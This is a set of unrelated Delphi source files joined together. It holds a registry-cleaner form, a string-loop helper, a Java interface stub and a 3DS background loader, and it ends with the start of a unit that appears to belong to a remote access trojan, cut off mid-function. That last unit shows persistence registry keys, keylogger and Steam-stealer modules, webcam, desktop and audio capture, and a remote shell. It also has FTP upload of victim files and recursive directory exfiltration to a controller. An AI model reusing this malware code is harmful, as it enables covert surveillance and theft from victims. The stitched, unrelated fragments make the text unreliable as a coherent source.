fmDataMod.RegExceptions[i-1].ExceptionType := etText; fmDataMod.RegExceptions[i-1].Text := GridRegException.Cells[2, i]; end; j := 0; for i := 1 to GridRegException.RowCount-1 do begin if GridRegException.Cells[1, i] = ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegKey') then begin ExceptionFile.WriteString('etKeyAddr', IntToStr(j), fmDataMod.RegExceptions[i-1].Text); inc(j); end; end; for i := 1 to GridRegException.RowCount-1 do begin if GridRegException.Cells[1, i] <> ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegKey') then begin ExceptionFile.WriteString('etText', IntToStr(j), fmDataMod.RegExceptions[i-1].Text); inc(j); end; end; Close; end; //========================================================= //========================================================= {КНОПКА "ДОБАВИТЬ"} //--------------------------------------------------------- procedure TfmSettings.btAddRegExclusionClick(Sender: TObject); begin fmRegExceptionsAdd := TfmRegExceptionsAdd.Create(Application); fmRegExceptionsAdd.ShowModal; fmRegExceptionsAdd.Free; end; //========================================================= //========================================================= {КНОПКА "УДАЛИТЬ"} //--------------------------------------------------------- procedure TfmSettings.btRemoveRegExclusionClick(Sender: TObject); var i, SelectedRowIndex : integer; begin i := 1; SelectedRowIndex := 0; while i <= GridRegException.RowCount - 1 do begin if GridRegException.RowSelect[i] then begin SelectedRowIndex := i; break; end; inc(i); end; GridRegException.RemoveRows(SelectedRowIndex, GridRegException.RowSelectCount); end; //========================================================= //========================================================= {КНОПКА "ПО УМОЛЧАНИЮ"} //--------------------------------------------------------- procedure TfmSettings.btDefaultClick(Sender: TObject); var i:integer; MsgCaption:string; begin MsgCaption := ReadLangStr('WinTuning_Common.lng', 'Common', 'Confirmation'); if Application.MessageBox(ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegExclusionsConfirmationQuery'), PChar(MsgCaption), MB_YESNO + MB_ICONQUESTION) = IDYES then begin GridRegException.RemoveRows(1,GridRegException.RowCount-1); if FileExists(fmDataMod.PathToUtilityFolder+'RegExceptions.ini') then DeleteFile(fmDataMod.PathToUtilityFolder+'RegExceptions.ini'); fmDataMod.FormRegExceptions; for i := 0 to Length(fmDataMod.RegExceptions)-1 do begin GridRegException.AddRow; if fmDataMod.RegExceptions[i].ExceptionType = etKeyAddr then GridRegException.Cells[1, i+1] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegKey') else GridRegException.Cells[1, i+1] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'Parameter'); GridRegException.Cells[2, i+1] := fmDataMod.RegExceptions[i].Text; end; GridRegException.AutoSizeColumns(True); end; end; //========================================================= //========================================================= {ПРИМЕНЕНИЕ ЯЗЫКА} //--------------------------------------------------------- procedure TfmSettings.ApplyLang; begin Caption := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'fmSettings'); lbRegExclusions.Caption := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'lbRegExclusions'); GridRegException.ColumnHeaders.Strings[1] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'GridRegException_1'); GridRegException.ColumnHeaders.Strings[2] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'GridRegException_2'); btAddRegExclusion.Caption := ReadLangStr('WinTuning_Common.lng', 'Common', 'Add'); btRemoveRegExclusion.Caption := ReadLangStr('WinTuning_Common.lng', 'Common', 'Delete'); btDefault.Caption := ReadLangStr('WinTuning_Common.lng', 'Common', 'Default'); btCancel.Caption := ReadLangStr('WinTuning_Common.lng', 'Common', 'Cancel'); end; //========================================================= //========================================================= {СОЗДАНИЕ ФОРМЫ} //--------------------------------------------------------- procedure TfmSettings.FormCreate(Sender: TObject); var i:integer; begin ApplyLang; for i := 0 to Length(fmDataMod.RegExceptions)-1 do begin GridRegException.AddRow; if fmDataMod.RegExceptions[i].ExceptionType = etKeyAddr then GridRegException.Cells[1, i+1] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'RegKey') else GridRegException.Cells[1, i+1] := ReadLangStr('RegistryCleaner.lng', 'Registry Cleaner', 'Parameter'); GridRegException.Cells[2, i+1] := fmDataMod.RegExceptions[i].Text; end; GridRegException.AutoSizeColumns(True); end; //========================================================= end.
{ Catarinka Quick Loopers Copyright (c) 2003-2019 Felipe Daragon License: 3-clause BSD See https://github.com/felipedaragon/catarinka/ for details Usage examples: LoopStringList(memo1.Lines, procedure(i:integer;s:string) begin memo2.Lines.Add(s); end ); LoopStringListEx(memo1.Lines, procedure(const line:TCatStringLoopLine) begin memo2.Lines.Add(line.value); end ); For more advanced loopers, check the CatStringLoop unit. } unit CatLoops; interface {$I Catarinka.inc} uses {$IFDEF DXE2_OR_UP} System.Classes, System.SysUtils, {$ELSE} Classes, SysUtils, {$ENDIF} CatStrings; type TCatStringLoopLine = record index: integer; count: integer; value: string; end; TCatStringLoopProc<T> = reference to procedure (const line: TCatStringLoopLine); procedure LoopStringList(sl: TStrings; const proc: TProc<integer, string>); procedure LoopStringListEx(sl: TStrings; const proc: TCatStringLoopProc<TCatStringLoopLine>); implementation procedure LoopStringList(sl: TStrings; const proc: TProc<integer, string>); var i, c: integer; begin c := sl.count; for i := 0 to c do begin if i < c then begin if Assigned(proc) then proc(i, sl[i]); end; end; end; procedure LoopStringListEx(sl: TStrings; const proc: TCatStringLoopProc<TCatStringLoopLine>); var i, c: integer; l: TCatStringLoopLine; begin c := sl.count; for i := 0 to c do begin if i < c then begin l.index := i; l.value := sl[i]; l.count := c; if Assigned(proc) then proc(l); end; end; end; end.
// // Generated by JavaToPas v1.5 20180804 - 082358 //////////////////////////////////////////////////////////////////////////////// unit java.nio.file.InvalidPathException; interface uses AndroidAPI.JNIBridge, Androidapi.JNI.JavaTypes; type JInvalidPathException = interface; JInvalidPathExceptionClass = interface(JObjectClass) ['{E9928774-18BF-44F8-BA7F-9364367B15B9}'] function getIndex : Integer; cdecl; // ()I A: $1 function getInput : JString; cdecl; // ()Ljava/lang/String; A: $1 function getMessage : JString; cdecl; // ()Ljava/lang/String; A: $1 function getReason : JString; cdecl; // ()Ljava/lang/String; A: $1 function init(input : JString; reason : JString) : JInvalidPathException; cdecl; overload;// (Ljava/lang/String;Ljava/lang/String;)V A: $1 function init(input : JString; reason : JString; &index : Integer) : JInvalidPathException; cdecl; overload;// (Ljava/lang/String;Ljava/lang/String;I)V A: $1 end; [JavaSignature('java/nio/file/InvalidPathException')] JInvalidPathException = interface(JObject) ['{5D7B3A47-7EE1-481A-A4FD-27C49424F103}'] function getIndex : Integer; cdecl; // ()I A: $1 function getInput : JString; cdecl; // ()Ljava/lang/String; A: $1 function getMessage : JString; cdecl; // ()Ljava/lang/String; A: $1 function getReason : JString; cdecl; // ()Ljava/lang/String; A: $1 end; TJInvalidPathException = class(TJavaGenericImport<JInvalidPathExceptionClass, JInvalidPathException>) end; implementation end.
unit GLD3dsBackground; interface uses Classes, GL, GLDTypes, GLDClasses, GLD3dsTypes, GLD3dsChunk, GLD3dsIo; type TGLD3dsBitmap = class; TGLD3dsSolid = class; TGLD3dsGradient = class; TGLD3dsBackground = class; TGLD3dsBitmap = class(TGLDSysClass) private FUse: GLboolean; FName: string; procedure SetUse(Value: GLboolean); procedure SetName(Value: string); function GetParams: TGLD3dsBitmapParams; procedure SetParams(Value: TGLD3dsBitmapParams); public constructor Create(AOwner: TPersistent); override; destructor Destroy; override; procedure Assign(Source: TPersistent); override; class function SysClassType: TGLDSysClassType; override; procedure LoadFromStream(Stream: TStream); override; procedure SaveToStream(Stream: TStream); override; property Params: TGLD3dsBitmapParams read GetParams write SetParams; published property Use: GLboolean read FUse write SetUse; property Name: string read FName write SetName; end; TGLD3dsSolid = class(TGLDSysClass) private FUse: GLboolean; FCol: TGLDColor4fClass; procedure SetUse(Value: GLboolean); procedure SetCol(Value: TGLDColor4fClass); function GetParams: TGLD3dsSolidParams; procedure SetParams(Value: TGLD3dsSolidParams); protected procedure SetOnChange(Value: TNotifyEvent); override; public constructor Create(AOwner: TPersistent); override; destructor Destroy; override; procedure Assign(Source: TPersistent); override; class function SysClassType: TGLDSysClassType; override; procedure LoadFromStream(Stream: TStream); override; procedure SaveToStream(Stream: TStream); override; function Read(Stream: TStream): GLboolean; property Params: TGLD3dsSolidParams read GetParams write SetParams; published property Use: GLboolean read FUse write SetUse; property Col: TGLDColor4fClass read FCol write SetCol; end; TGLD3dsGradient = class(TGLDSysClass) private FUse: GLboolean; FPercent: GLfloat; FTop: TGLDColor4fClass; FMiddle: TGLDColor4fClass; FBottom: TGLDColor4fClass; procedure SetUse(Value: GLboolean); procedure SetPercent(Value: GLfloat); procedure SetTop(Value: TGLDColor4fClass); procedure SetMiddle(Value: TGLDColor4fClass); procedure SetBottom(Value: TGLDColor4fClass); function GetParams: TGLD3dsGradientParams; procedure SetParams(Value: TGLD3dsGradientParams); protected procedure SetOnChange(Value: TNotifyEvent); override; public constructor Create(AOwner: TPersistent); override; destructor Destroy; override; procedure Assign(Source: TPersistent); override; class function SysClassType: TGLDSysClassType; override; procedure LoadFromStream(Stream: TStream); override; procedure SaveToStream(Stream: TStream); override; function Read(Stream: TStream): GLboolean; property Params: TGLD3dsGradientParams read GetParams write SetParams; published property Use: GLboolean read FUse write SetUse; property Percent: GLfloat read FPercent write SetPercent; property Top: TGLDColor4fClass read FTop write SetTop; property Middle: TGLDColor4fClass read FMiddle write SetMiddle; property Bottom: TGLDColor4fClass read FBottom write SetBottom; end; TGLD3dsBackground = class(TGLDSysClass) private FBitmap: TGLD3dsBitmap; FSolid: TGLD3dsSolid; FGradient: TGLD3dsGradient; procedure SetBitmap(Value: TGLD3dsBitmap); procedure SetSolid(Value: TGLD3dsSolid); procedure SetGradient(Value: TGLD3dsGradient); function GetParams: TGLD3dsBackgroundParams; procedure SetParams(Value: TGLD3dsBackgroundParams); protected procedure SetOnChange(Value: TNotifyEvent); override; public constructor Create(AOwner: TPersistent); override; destructor Destroy; override; procedure Assign(Source: TPersistent); override; class function SysClassType: TGLDSysClassType; override; procedure LoadFromStream(Stream: TStream); override; procedure SaveToStream(Stream: TStream); override; function Read(Stream: TStream): GLboolean; property Params: TGLD3dsBackgroundParams read GetParams write SetParams; published property Bitmap: TGLD3dsBitmap read FBitmap write SetBitmap; property Solid: TGLD3dsSolid read FSolid write SetSolid; property Gradient: TGLD3dsGradient read FGradient write SetGradient; end; implementation constructor TGLD3dsBackground.Create(AOwner: TPersistent); begin inherited Create(AOwner); FBitmap := TGLD3dsBitmap.Create(Self); FSolid := TGLD3dsSolid.Create(Self); FGradient := TGLD3dsGradient.Create(Self); end; destructor TGLD3dsBackground.Destroy; begin FBitmap.Free; FSolid.Free; FGradient.Free; inherited Destroy; end; procedure TGLD3dsBackground.Assign(Source: TPersistent); begin if (Source = nil) or (Source = Self) then Exit; if not (Source is TGLD3dsBackground) then Exit; SetParams(TGLD3dsBackground(Source).GetParams); end; class function TGLD3dsBackground.SysClassType: TGLDSysClassType; begin Result := GLD_SYSCLASS_3DS_BACKGROUND; end; procedure TGLD3dsBackground.LoadFromStream(Stream: TStream); begin FBitmap.LoadFromStream(Stream); FSolid.LoadFromStream(Stream); FGradient.LoadFromStream(Stream); end; procedure TGLD3dsBackground.SaveToStream(Stream: TStream); begin FBitmap.SaveToStream(Stream); FSolid.SaveToStream(Stream); FGradient.SaveToStream(Stream); end; function TGLD3dsBackground.Read(Stream: TStream): GLboolean; var C: TGLD3dsChunk; begin Result := False; if not GLD3dsChunkReadStart(C, 0, Stream) then Exit; repeat GLD3dsChunkRead(C, Stream); case C.Chunk of GLD3DS_BIT_MAP: begin FBitmap.FName := GLD3dsIoReadString(Stream); end; GLD3DS_SOLID_BGND: begin GLD3dsChunkReadReset(Stream); if not FSolid.Read(Stream) then Exit; end; GLD3DS_V_GRADIENT: begin GLD3dsChunkReadReset(Stream); if not FGradient.Read(Stream) then Exit; end; GLD3DS_USE_BIT_MAP: begin FBitmap.FUse := True; end; GLD3DS_USE_SOLID_BGND: begin FSolid.FUse := True; end; GLD3DS_USE_V_GRADIENT: begin FGradient.FUse := True; end; else begin GLD3dsChunkReadReset(Stream); C.Chunk := 0; end; end; until C.Chunk = 0; Result := True; end; procedure TGLD3dsBackground.SetOnChange(Value: TNotifyEvent); begin inherited SetOnChange(Value); FBitmap.OnChange := FOnChange; FSolid.OnChange := FOnChange; FGradient.OnChange := FOnChange; end; procedure TGLD3dsBackground.SetBitmap(Value: TGLD3dsBitmap); begin FBitmap.Assign(Value); end; procedure TGLD3dsBackground.SetSolid(Value: TGLD3dsSolid); begin FSolid.Assign(Value); end; procedure TGLD3dsBackground.SetGradient(Value: TGLD3dsGradient); begin FGradient.Assign(Value); end; function TGLD3dsBackground.GetParams: TGLD3dsBackgroundParams; begin Result := GLDX3DSBackgroundParams(FBitmap.GetParams, FSolid.GetParams, FGradient.GetParams); end; procedure TGLD3dsBackground.SetParams(Value: TGLD3dsBackgroundParams); begin if GLDX3DSBackgroundParamsEqual(GetParams, Value) then Exit; FBitmap.SetParams(Value.Bitmap); FSolid.SetParams(Value.Solid); FGradient.SetParams(Value.Gradient); end; constructor TGLD3dsBitmap.Create(AOwner: TPersistent); begin inherited Create(AOwner); FUse := False; FName := ''; end; destructor TGLD3dsBitmap.Destroy; begin inherited Destroy; end; procedure TGLD3dsBitmap.Assign(Source: TPersistent); begin if (Source = nil) or (Source = Self) then Exit; if not (Source is TGLD3dsBitmap) then Exit; SetParams(TGLD3dsBitmap(Source).GetParams); end; class function TGLD3dsBitmap.SysClassType: TGLDSysClassType; begin Result := GLD_SYSCLASS_3DS_BITMAP; end; procedure TGLD3dsBitmap.LoadFromStream(Stream: TStream); begin Stream.Read(FUse, SizeOf(GLboolean)); GLDXLoadStringFromStream(Stream, FName); end; procedure TGLD3dsBitmap.SaveToStream(Stream: TStream); begin Stream.Write(FUse, SizeOf(GLboolean)); GLDXSaveStringToStream(Stream, FName); end; procedure TGLD3dsBitmap.SetUse(Value: GLboolean); begin if FUse = Value then Exit; FUse := Value; Change; end; procedure TGLD3dsBitmap.SetName(Value: string); begin if FName = Value then Exit; FName := Value; Change; end; function TGLD3dsBitmap.GetParams: TGLD3dsBitmapParams; begin Result := GLDX3DSBitmapParams(FUse, FName); end; procedure TGLD3dsBitmap.SetParams(Value: TGLD3dsBitmapParams); begin if GLDX3DSBitmapParamsEqual(GetParams, Value) then Exit; FUse := Value.Use; FName := Value.Name; Change; end; constructor TGLD3dsSolid.Create(AOwner: TPersistent); begin inherited Create(AOwner); FUse := False; FCol := TGLDColor4fClass.Create(Self); end; destructor TGLD3dsSolid.Destroy; begin FCol.Free; inherited Destroy; end; procedure TGLD3dsSolid.Assign(Source: TPersistent); begin if (Source = nil) or (Source = Self) then Exit; if not (Source is TGLD3dsSolid) then Exit; SetParams(TGLD3dsSolid(Source).GetParams); end; class function TGLD3dsSolid.SysClassType: TGLDSysClassType; begin Result := GLD_SYSCLASS_3DS_SOLID; end; procedure TGLD3dsSolid.LoadFromStream(Stream: TStream); begin Stream.Read(FUse, SizeOf(GLboolean)); Stream.Read(FCol.GetPointer^, SizeOf(TGLDColor3f)); end; procedure TGLD3dsSolid.SaveToStream(Stream: TStream); begin Stream.Write(FUse, SizeOf(GLboolean)); Stream.Write(FCol.GetPointer^, SizeOf(TGLDColor3f)); end; function TGLD3dsSolid.Read(Stream: TStream): GLboolean; var C: TGLD3dsChunk; HaveLin: GLboolean; begin Result := False; HaveLin := False; if not GLD3dsChunkReadStart(C, GLD3DS_SOLID_BGND, Stream) then Exit; repeat GLD3dsChunkRead(C, Stream); case C.Chunk of GLD3DS_LIN_COLOR_F: begin PGLDColor3f(FCol.GetPointer)^ := GLD3dsIoReadRgb(Stream); HaveLin := True; end; GLD3DS_COLOR_F: begin PGLDColor3f(FCol.GetPointer)^ := GLD3dsIoReadRgb(Stream); end; else begin GLD3dsChunkReadReset(Stream); C.Chunk := 0; end; end; until C.Chunk = 0; Result := True; end; procedure TGLD3dsSolid.SetOnChange(Value: TNotifyEvent); begin inherited SetOnChange(Value); FCol.OnChange := FOnChange; end; procedure TGLD3dsSolid.SetUse(Value: GLboolean); begin if FUse = Value then Exit; FUse := Value; Change; end; procedure TGLD3dsSolid.SetCol(Value: TGLDColor4fClass); begin FCol.Assign(Value); end; function TGLD3dsSolid.GetParams: TGLD3dsSolidParams; begin Result := GLDX3DSSolidParams(FUse, FCol.Color3f); end; procedure TGLD3dsSolid.SetParams(Value: TGLD3dsSolidParams); begin if GLDX3DSSolidParamsEqual(GetParams, Value) then Exit; FUse := Value.Use; PGLDColor3f(FCol.GetPointer)^ := Value.Col; Change; end; constructor TGLD3dsGradient.Create(AOwner: TPersistent); begin inherited Create(AOwner); FUse := False; FTop := TGLDColor4fClass.Create(Self); FMiddle := TGLDColor4fClass.Create(Self); FBottom := TGLDColor4fClass.Create(Self); end; destructor TGLD3dsGradient.Destroy; begin FTop.Free; FMiddle.Free; FBottom.Free; inherited Destroy; end; procedure TGLD3dsGradient.Assign(Source: TPersistent); begin if (Source = nil) or (Source = Self) then Exit; if not (Source is TGLD3dsGradient) then Exit; SetParams(TGLD3dsGradient(Source).GetParams); end; class function TGLD3dsGradient.SysClassType: TGLDSysClassType; begin Result := GLD_SYSCLASS_3DS_GRADIENT; end; procedure TGLD3dsGradient.LoadFromStream(Stream: TStream); begin Stream.Read(FUse, SizeOf(GLboolean)); Stream.Read(FPercent, SizeOf(GLfloat)); FTop.LoadFromStream(Stream); FMiddle.LoadFromStream(Stream); FBottom.LoadFromStream(Stream); end; procedure TGLD3dsGradient.SaveToStream(Stream: TStream); begin Stream.Write(FUse, SizeOf(GLboolean)); Stream.Write(FPercent, SizeOf(GLfloat)); FTop.SaveToStream(Stream); FMiddle.SaveToStream(Stream); FBottom.SaveToStream(Stream); end; function TGLD3dsGradient.Read(Stream: TStream): GLboolean; var C: TGLD3dsChunk; Index: array[0..1] of GLint; Col: array[0..1, 0..2] of TGLDColor4f; HaveLin: GLboolean; i: GLint; begin Result := False; if not GLD3dsChunkReadStart(C, GLD3DS_V_GRADIENT, Stream) then Exit; FPercent := GLD3dsIoReadFloat(Stream); Index[0] := 0; Index[1] := 0; repeat GLD3dsChunkRead(C, Stream); case C.Chunk of GLD3DS_COLOR_F: begin PGLDColor3f(@Col[0][Index[0]])^ := GLD3dsIoReadRgb(Stream); Inc(Index[0]); end; GLD3DS_LIN_COLOR_F: begin PGLDColor3f(@Col[1][Index[1]])^ := GLD3dsIoReadRgb(Stream); Inc(Index[1]); HaveLin := True; end; else begin GLD3dsChunkReadReset(Stream); C.Chunk := 0; end; end; until C.Chunk = 0; for i := 0 to 2 do if HaveLin then begin PGLDColor4f(FTop.GetPointer)^ := Col[GLubyte(HaveLin)][0]; PGLDColor4f(FMiddle.GetPointer)^ := Col[GLubyte(HaveLin)][1]; PGLDColor4f(FBottom.GetPointer)^ := Col[GLubyte(HaveLin)][2]; end; Result := True; end; procedure TGLD3dsGradient.SetOnChange(Value: TNotifyEvent); begin inherited SetOnChange(Value); FTop.OnChange := FOnChange; FMiddle.OnChange := FOnChange; FBottom.OnChange := FOnChange; end; procedure TGLD3dsGradient.SetUse(Value: GLboolean); begin if FUse = Value then Exit; FUse := Value; Change; end; procedure TGLD3dsGradient.SetPercent(Value: GLfloat); begin if FPercent = Value then Exit; FPercent := Value; Change; end; procedure TGLD3dsGradient.SetTop(Value: TGLDColor4fClass); begin FTop.Assign(Value); end; procedure TGLD3dsGradient.SetMiddle(Value: TGLDColor4fClass); begin FMiddle.Assign(Value); end; procedure TGLD3dsGradient.SetBottom(Value: TGLDColor4fClass); begin FBottom.Assign(Value); end; function TGLD3dsGradient.GetParams: TGLD3dsGradientParams; begin Result := GLDX3DSGradientParams(FUse, FPercent, FTop.Color4f, FMiddle.Color4f, FBottom.Color4f); end; procedure TGLD3dsGradient.SetParams(Value: TGLD3dsGradientParams); begin if GLDX3DSGradientParamsEqual(GetParams, Value) then Exit; FUse := Value.Use; FPercent := Value.Percent; PGLDColor4f(FTop.GetPointer)^ := Value.Top; PGLDColor4f(FMiddle.GetPointer)^ := Value.Middle; PGLDColor4f(FBottom.GetPointer)^ := Value.Bottom; Change; end; end.
Unit UnitExecutarComandos; interface uses windows; Const CurrentVersion = 'Software\Microsoft\Windows\CurrentVersion\Run'; PoliciesKey = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'; InstalledComp = 'Software\Microsoft\Active Setup\Installed Components\'; UNINST_PATH = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall'; type TThreadSearch = Class(TObject) public Diretorio: String; Mascara: string; constructor Create(pDiretorio, pMascara: string); overload; end; type TThreadDownloadDir = Class(TObject) public Diretorio: String; constructor Create(pDiretorio: string); overload; end; const DelimitadorDeImagem = '**********'; MSNseparador = '##@@##'; var ComandoRecebido: string; MainInfoBuffer: string; MasterCommandThreadId: THandle; ShellThreadID: THandle = 0; AudioThreadId: THandle = 0; ListarChavesRegistro: THandle = 0; ListarValoresRegistro: THandle = 0; DesktopIntervalo: integer; DesktopQuality: integer; EixoXDesktop: integer; EixoYDesktop: integer; WebcamIntervalo: integer; WebcamQuality: integer; ToSendSearch: string; ToDownloadDIR: string; SearchID: THandle = 0; DownloadDIRId: Thandle = 0; MuliDownFile: string; MuliDownFileSize: int64; swapmouse, blockmouse: boolean; LastCommand: integer = 0; procedure ExecutarComando; function GetNewIdentificationName(NewName: string): string; function GetFirstExecution: string; implementation uses UnitConexao, UnitSettings, UnitComandos, UnitCarregarFuncoes, UnitDiversos, UnitServerUtils, UnitKeylogger, SocketUnit, DeleteUnit, UnitVariaveis, UnitShell, Messages, UnitWebcam, ListarProgramas, UnitListarProcessos, UnitServicos, UnitClipboard, UnitRegistro, UnitSteamStealer, UnitServerOpcoesExtras, UnitListarPortasAtivas, UnitInformacoes, APIWindow, APIControl, uFTP, ActiveX, UnitJanelas, ListarDispositivos, UnitFileManager, untCapFuncs, UnitAudio, StreamUnit, UnitDebug; type RecordSearchResult = record Find: TWin32FindData; TipoDeArquivo: shortString; Dir: shortString; end; ///////// CHAT ////////// var MainWnd: TSDIMainWindow; Memo1: TAPIMemo; Edit1: TAPIEdit; Button1: TAPIButton; CheckHWND: cardinal; Sairdochat: boolean = false; var ServerName, ClientName: string; Envia, Enviou, ButtonCaption: string; FormCaption: string; FontName: string; FontSize: cardinal; MainColor, MemoColor, EditColor, MemoTextColor, EditTextColor: cardinal; MensagemCHATRecebida: string; BlockMouseHandle: THandle; function GetFirstExecution: string; var tempstr: string; begin result := lerreg(HKEY_CURRENT_USER, pchar('SOFTWARE\' + Identificacao), pchar('FirstExecution'), ''); if result = '' then begin tempstr := getday + '/' + getmonth + '/' + getyear + ' -- ' + gethour + ':' + GetMinute; Write2Reg(HKEY_CURRENT_USER, 'SOFTWARE\' + Identificacao, 'FirstExecution', tempstr); end; end; function EnviarArquivoFTP(FTPAddress, FTPUser, FTPPass: string; FTPPort: integer; Thefile: string): boolean; var ftp: tFtpAccess; filedata: string; // buffer do arquivo c: cardinal; FTPFilename: string; begin Result := false; filedata := lerarquivo(Thefile, c); if filedata = '' then exit; FTPFilename := NewIdentification + '_' + ExtractDiskSerial(myrootfolder) + '_' + extractfilename(Thefile); ftp := tFtpAccess.create(FTPAddress, FTPUser, FTPPass, FTPPort); if (not assigned(ftp)) or (not ftp.connected) then begin ftp.Free; exit; end; if ftp.SetDir('./') = false then begin ftp.Free; exit; end; // Enviando arquivo if not ftp.Putfile(FileData, FTPFilename) then begin ftp.Free; exit; end; if ftp.FileSize(FTPFilename) = MyGetFileSize(Thefile) then result := true; ftp.free; end; procedure DefinirHandle; var Msg: TMsg; X: THandle; begin X := 0; while (Sairdochat = false) and (ClientSocket.Connected = true) do begin if MainWnd <> nil then X := MainWnd.Handle; _ProcessMessages; end; end; procedure CheckMSG; var Msg: TMsg; begin sleep(500); while (Sairdochat = false) and (ClientSocket.Connected = true) do begin if (MensagemCHATRecebida <> '') and (MainWnd <> nil) then begin memo1.Text := Memo1.Text + ClientName + ' ' + Enviou + #13#10 + MensagemCHATRecebida + #13#10 + #13#10; MensagemCHATRecebida := ''; memo1.Scroll(memo1.LineCount); MainWnd.Center; SetWindowPos(MainWnd.Handle, HWND_TOPMOST, 0, 0, 0, 0, SWP_NOACTIVATE or SWP_NOMOVE or SWP_NOSIZE); if (getforegroundwindow <> MainWnd.Handle) then setforegroundwindow(MainWnd.Handle); end; _ProcessMessages; end; end; procedure Button1Click(var Msg: TMessage); begin _EnviarStream(ClientSocket, CHATMSG + '|' + Edit1.Text + '|'); memo1.Text := Memo1.Text + ServerName + ' ' + Envia + ' ---> ' + ClientName + #13#10 + Edit1.Text + #13#10 + #13#10; Edit1.Text := ''; end; procedure ChangeTextFont(HWND: cardinal; FontName: string; size: integer = 11); var hFont: cardinal; begin { ** Create Font ** } hFont := CreateFont(-size, 0, 0, 0, 400, 0, 0, 0, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, CLIP_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH or FF_DONTCARE, pchar(FontName)); { Change fonts } if hFont <> 0 then SendMessage(HWND, WM_SETFONT, hFont, 0); end; procedure MainDestroy(var Msg: TMessage); begin Sairdochat := true; //PostQuitMessage(0); end; ///////// CHAT END //////// var WebcamCS: TClientSocket; DesktopCS: TClientSocket; cadena: string; function WindowsList: string; function EnumWindowProc(Hwnd: HWND; i: integer): boolean; stdcall; var Titulo : string; begin if (Hwnd=0) then begin result := false; end else begin SetLength(Titulo, 255); SetLength(Titulo, GetWindowText(Hwnd, PChar(Titulo), Length(Titulo))); if IsWindowVisible(Hwnd) and (Titulo <> '') then begin Cadena := Cadena + Titulo + '|' + IntToStr(Hwnd) + '|'; end else if (IsWindowVisible(Hwnd) = false) and (Titulo <> '') then begin Cadena := Cadena + '*@*@' + Titulo + '|' + IntToStr(Hwnd) + '|'; end; Result := true; end; end; begin Cadena := ''; EnumWindows(@EnumWindowProc, 0); result := cadena; end; procedure DownloadSelected; var TempStr: string; TempInt: int64; begin TempStr := MuliDownFile; TempInt := MuliDownFileSize; EnviarArquivo(ClientSocket, FILEMANAGER + '|' + DOWNLOAD + '|' + TempStr + '|', TempStr, TempInt, 0); end; procedure DownloadRecSelected; var TempStr: string; TempInt: int64; begin TempStr := MuliDownFile; TempInt := MuliDownFileSize; EnviarArquivo(ClientSocket, FILEMANAGER + '|' + DOWNLOADREC + '|' + extractfilepath(TempStr) + '|' + TempStr + '|', TempStr, TempInt, 0); end; function PossoMexerNoArquivo(Arquivo: string): boolean; var HFileRes: HFile; begin result := true; HFileRes := CreateFile(PChar(Arquivo), GENERIC_READ, 0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); if HFileRes = INVALID_HANDLE_VALUE then result := false; CloseHandle(HFileRes); end; procedure FileSearch(const PathName, FileName : string; const InDir : boolean); var Rec: TSearchRec; Path, Tempdir: string; tamanho: int64; Tipo, FileDate: string; RSR: RecordSearchResult; ResultStream: TMemoryStream; TempFile: string; begin path := PathName; if copy(path, 1, pos('?', path) - 1) = 'ALL' then begin Tempdir := path; delete(tempdir, 1, pos('?', Tempdir)); while pos('?', Tempdir) > 0 do begin sleep(50); try FileSearch(copy(Tempdir, 1, pos('?', Tempdir) - 1), FileName, TRUE); except end; delete(tempdir, 1, pos('?', Tempdir)); end; exit; end; if path[length(path)] <> '\' then path := path + '\'; if FindFirst(Path + FileName, faAnyFile - faDirectory, Rec) = 0 then try repeat ResultStream := TMemoryStream.Create; RSR.Find := Rec.FindData; RSR.TipoDeArquivo := TipoArquivo(Path + string(Rec.FindData.cFileName), extractfileext(string(Rec.FindData.cFileName))); RSR.Dir := Path; ResultStream.WriteBuffer(RSR, sizeof(RecordSearchResult)); ToSendSearch := ToSendSearch + StreamToStr(ResultStream); ResultStream.Free; TempFile := mytempfolder + inttostr(gettickcount) + '.tmp'; criararquivo(TempFile, '', 0); Mydeletefile(TempFile); until FindNext(Rec) <> 0; finally _myFindClose(Rec); end; If not InDir then Exit; if FindFirst(Path + '*.*', faDirectory, Rec) = 0 then try repeat if ((Rec.Attr and faDirectory) <> 0) and (Rec.Name <> '.') and (Rec.Name <> '..') then FileSearch(Path + Rec.Name, FileName, True); until FindNext(Rec) <> 0; finally _myFindClose(Rec); end; end; procedure FileSearchDownloadDir(const PathName: string; const InDir : boolean); var Rec: TSearchRec; Path, Tempdir: string; tamanho: int64; Tipo, FileDate: string; TempFile: string; begin path := PathName; if path[length(path)] <> '\' then path := path + '\'; if FindFirst(Path + '*.*', faAnyFile - faDirectory, Rec) = 0 then try repeat if length(Path + Rec.Name) > 3 then // porque c:\ tem tamanho 3 hehe ToDownloadDIR := ToDownloadDIR + Path + Rec.Name + '|'; TempFile := mytempfolder + inttostr(gettickcount) + '.tmp'; criararquivo(TempFile, '', 0); Mydeletefile(TempFile); until FindNext(Rec) <> 0; finally _myFindClose(Rec); end; If not InDir then Exit; if FindFirst(Path + '*.*', faDirectory, Rec) = 0 then try repeat if ((Rec.Attr and faDirectory) <> 0) and (Rec.Name <> '.') and (Rec.Name <> '..') then FileSearchDownloadDir(Path + Rec.Name, True); until FindNext(Rec) <> 0; finally _myFindClose(Rec); end; end; function FileExistsOnComputer(const PathName, FileName : string; const InDir : boolean; var ArquivoEncontrado: string): boolean; var Rec: TSearchRec; Path, Tempdir: string; tamanho: int64; Tipo, FileDate: string; TempFile: string; begin result := false; path := PathName; ArquivoEncontrado := ''; if path[length(path)] <> '\' then path := path + '\'; try if FindFirst(Path + FileName, faAnyFile - faDirectory, Rec) = 0 then try repeat if length(Path + Rec.Name) > 3 then begin result := true; ArquivoEncontrado := Path + Rec.Name; end; TempFile := mytempfolder + inttostr(gettickcount) + 